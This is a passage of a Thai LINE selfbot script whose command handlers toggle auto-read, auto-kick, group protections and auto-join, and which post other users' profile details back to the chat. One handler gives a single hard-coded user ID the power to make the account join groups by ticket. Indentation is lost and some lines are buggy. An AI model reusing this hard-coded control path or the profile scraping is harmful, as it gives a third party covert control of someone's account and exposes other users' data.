wait["steal"] = False
break
except:
pass
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "u7a4febc4c650fc7679eadf4245c2a5ad":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
# Op program in bot Comment By Googlez #
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"ɴᴏᴛ ᴛᴏ ᴄᴏᴍᴍᴇɴᴛ")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"ɴᴏ ʙʟᴀᴄᴋʟɪsᴛ ᴜsᴇʀ")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif "TL:" in msg.text:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Help","คำสั่ง"]:
cl.sendText(msg.to, helpMessage + "")
elif msg.text in ["Help2"]:
cl.sendText(msg.to, helpMessage2 + "")
#======================================================#
elif msg.text in ["อ่านเปิด","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"Auto Sider ON")
elif msg.text in ["อ่านปิด","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"Auto Sider OFF")
#======================================================#
elif msg.text in ["แท็กเปิด","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["แท็กปิด","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
#======================================================#
elif msg.text in ["เตะแท็กเปิด","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick ON")
elif msg.text in ["เตะแท็กปิด","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick OFF")
#======================================================#
elif msg.text in ["ทักเข้า","Hhx1"]:
cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"]))
elif msg.text in ["ทักออก","Hhx2"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"]))
elif msg.text in ["ทักลบ","Hhx3"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"]))
#======================================================#
elif "ทักเข้า: " in msg.text:
c = msg.text.replace("ทักเข้า: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["acomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c)
elif "ทักออก: " in msg.text:
c = msg.text.replace("ทักออก: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["bcomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c)
elif "ทักลบ: " in msg.text:
c = msg.text.replace("ทักลบ: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["ccomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c)
#======================================================#
elif msg.text in ["ต้อนรับเปิด"]:
if wait["acommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["acommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ต้อนรับปิด"]:
if wait["acommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["acommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
#======================================================#
elif msg.text in ["ทักออกเปิด"]:
if wait["bcommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["bcommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ทักออกปิด"]:
if wait["bcommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["bcommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
#======================================================#
elif msg.text in ["ทักลบเปิด"]:
if wait["ccommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["ccommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ทักลบปิด"]:
if wait["ccommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["ccommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
#======================================================#
elif msg.text.lower() == 'เช็คคทเปิด':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบเช็ค คท \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดระบบคอมเช็ค คท\n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'เช็คคทปิด':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบเช็ค คท")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบเช็คคทอยู่ \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ['ป้องกันเปิด']:
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบกัน By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดระบบกัน\n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบกัน\n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดระบบป้องกันอยุ่")
elif msg.text in ["ป้องกันปิด"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบป้องกัน \nBy. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดระบบป้องกัน \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ['กันลิ้งค์เปิด']:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Enable 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protect Enable��")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["กันลิ้งค์ปิด","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Disable ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text in ['กันเชิญเปิด']:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["กันเชิญปิด"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protection Disable ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text in ['กันยกเลิกเปิด']:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Enable 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["กันยกเลิกปิด"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Disable ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text.lower() == 'เข้าออโต้เปิด':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'เข้าออโต้ปิด':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Already Off")
else:
cl.sendText(msg.to,"Auto Join set off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text in ["ออกแชทรวมเปิด","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["ออกแชทรวมปิด","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
#======================================================#
elif msg.text in ["แชร์เปิด","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["แชร์ปิด","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
#======================================================#
elif msg.text in ["แอดเปิด","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["แอดปิด","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
#======================================================#
elif msg.text in ["คอมเม้นเปิด","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบคอมเม้น \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบคอมเม้น\nBy. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["คอมเม้นปิด"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบคอมเม้น \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["Notifedbot on","เปิดเเจ้งเตือนบอท","Mbot on"]:
if msg.from_ in admin:
if wait["Notifedbot"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["Notifedbot"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["Notifedbot off","ปิดแจ้งเตือนบอท","Mbot off"]:
if msg.from_ in admin:
if wait["Notifedbot"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["Notifedbot"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["กันยกเลิก1เปิด","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["กันยกเลิก1ปิด","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
#======================================================#
elif msg.text in ["เปิดลิ้งค์"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["ปิดลิ้งค์"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close ô€¨👈")
else:
cl.sendText(msg.to,"URL close ��€¨👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
#======================================================#
elif msg.text in ["เปิดหมด"]:
cl.sendText(msg.to,"อ่านเปิด")
cl.sendText(msg.to,"แท็กเปิด")
cl.sendText(msg.to,"เตะแท็กเปิด")
cl.sendText(msg.to,"ต้อนรับเปิด")
cl.sendText(msg.to,"ทักออกเปิด")
cl.sendText(msg.to,"ทักลบเปิด")
cl.sendText(msg.to,"เช็คคทเปิด")
cl.sendText(msg.to,"ป้องกันเปิด")
cl.sendText(msg.to,"กันลิ้งค์เปิด")
cl.sendText(msg.to,"กันเชิญเปิด")
cl.sendText(msg.to,"กันยกเลิกเปิด")
cl.sendText(msg.to,"เข้าออโต้เปิด")
cl.sendText(msg.to,"ออกแชทรวมเปิด")
cl.sendText(msg.to,"แอดเปิด")
cl.sendText(msg.to,"คอมเม้นเปิด")
cl.sendText(msg.to,"เปิดแจ้งเตือน")
cl.sendText(msg.to,"เปิดแจ้งเตือนบอท")
cl.sendText(msg.to,"กันยกเลิก1เปิด")
cl.sendText(msg.to,"แชร์เปิด")
cl.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["ปิดหมด"]:
cl.sendText(msg.to,"อ่านปิด")
cl.sendText(msg.to,"แท็กปิด")
cl.sendText(msg.to,"เตะแท็กปิด")
cl.sendText(msg.to,"ต้อนรับปิด")
cl.sendText(msg.to,"ทักออกปิด")
cl.sendText(msg.to,"ทักลบปิด")
cl.sendText(msg.to,"เช็คคทปิด")
cl.sendText(msg.to,"ป้องกันปิด")
cl.sendText(msg.to,"กันลิ้งค์ปิด")
cl.sendText(msg.to,"กันเชิญปิด")
cl.sendText(msg.to,"กันยกเลิกปิด")
cl.sendText(msg.to,"เข้าออโต้ปิด")
cl.sendText(msg.to,"ออกแชทรวมปิด")
cl.sendText(msg.to,"แอดปิด")
cl.sendText(msg.to,"คอมเม้นปิด")
cl.sendText(msg.to,"ปิดแจ้งเตือน")
cl.sendText(msg.to,"ปิดแจ้งเตือนบอท")
cl.sendText(msg.to,"กันยกเลิก1ปิด")
cl.sendText(msg.to,"แชร์ปิด")
cl.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["Set1"]:
md = " ༺ πနးຫຮี่のีধ์͜͡ ༻\n"
if wait["contact"] == True: md+=" Contact:on \n"
else: md+=" Contact:off\n"
if wait["autoJoin"] == True: md+=" Auto Join:on \n"
else: md +=" Auto Join:off\n"
if wait["autoCancel"]["on"] == True:md+=" Auto cancel:" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel:off \n"
if wait["leaveRoom"] == True: md+=" Auto leave:on \n"
else: md+=" Auto leave:off \n"
if wait["timeline"] == True: md+=" Share:on \n"
else:md+=" Share:off \n"
if wait["autoAdd"] == True: md+=" Auto add:on \n"
else:md+=" Auto add:off ��\n"
if wait["commentOn"] == True: md+=" Auto komentar:on \n"
else:md+=" Auto komentar:off \n"
if wait["protect"] == True: md+=" Protect:on 🔓\n"
else:md+=" Protect:off 🔒\n"
if wait["linkprotect"] == True: md+="Link Protect:on 🔓\n"
else:md+=" Link Protect:off🔒\n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on🔓\n"
else:md+=" Invitation Protect:off🔒\n"
if wait["cancelprotect"] == True: md+" CancelProtect:on 🔓\n"
else:md+=" Cancel Protect:off 🔒\n"
cl.sendText(msg.to,"""
༺ πနးຫຮี่のีধ์͜͡ ༻
""" + md)
#======================================================#
elif msg.text in ["Set2"]:
md = " ༺ πနးຫຮี่のีধ์͜͡ ༻\n\n"
if wait["likeOn"] == True: md+=" Auto like : on \n"
else:md+=" Auto like : off \n"
if wait["alwayRead"] == True: md+=" Read : on \n"
else:md+="�� Read : off \n"
if wait["detectMention"] == True: md+=" Autorespon : on \n"
else:md+=" Autorespon : off \n"
if wait["kickMention"] == True: md+=" Autokick: on ����\n"
else:md+=" Autokick : off \n"
if wait["Notifed"] == True: md+=" Notifed : on \n"
else:md+=" Notifed : off \n"
if wait["Notifedbot"] == True: md+=" Notifedbot : on \n"
else:md+=" Notifedbot : off \n"
if wait["acommentOn"] == True: md+=" Hhx1 : on \n"
else:md+=" Hhx1 : off \n"
if wait["bcommentOn"] == True: md+=" Hhx2 : on \n"
else:md+=" Hhx2 : off \n"
if wait["ccommentOn"] == True: md+=" Hhx3 : on \n"
else:md+=" Hhx3 : off \n"
if wait["Protectcancl"] == True: md+=" Cancel : on \n"
else:md+=" Cancel : off \n"
if wait["winvite"] == True: md+=" Invite : on \n"
else:md+=" Invite : off \n"
if wait["pname"] == True: md+=" Namelock : on \n"
else:md+=" Namelock : off \n"
if wait["contact"] == True: md+=" Contact : on \n"
else: md+=" Contact : off \n"
if wait["autoJoin"] == True: md+=" Auto join : on \n"
else: md +=" Auto join : off \n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + " \n"
else: md+= " Group cancel : off \n"
if wait["leaveRoom"] == True: md+=" Auto leave : on \n"
else: md+=" Auto leave : off \n"
if wait["timeline"] == True: md+=" Share : on \n"
else:md+=" Share : off \n"
if wait["clock"] == True: md+=" Clock Name : on \n"
else:md+=" Clock Name : off \n"
if wait["autoAdd"] == True: md+=" Auto add : on \n"
else:md+=" Auto add : off \n"
if wait["commentOn"] == True: md+=" Comment : on \n"
else:md+=" Comment : off \n"
if wait["Backup"] == True: md+=" Backup : on \n"
else:md+=" Backup : off \n"
if wait["qr"] == True: md+=" Protect QR : on \n"
else:md+=" Protect QR : off \n"
cl.sendText(msg.to,"""
༺ πနးຫຮี่のีধ์͜͡ ༻
""" + md)
#======================================================#
elif msg.text in ["แท็ก1","Tag1"]:
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ\n\n" + str(wait["tag1"]))
elif msg.text in ["แท็ก2","Tag2"]:
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ\n\n" + str(wait["tag2"]))
elif "แท็ก1: " in msg.text:
wait["tag1"] = msg.text.replace("Tag1: ","")
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ")
elif "แท็ก2: " in msg.text:
wait["tag2"] = msg.text.replace("Tag2: ","")
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JกP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["เช็คข้อความแอด","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
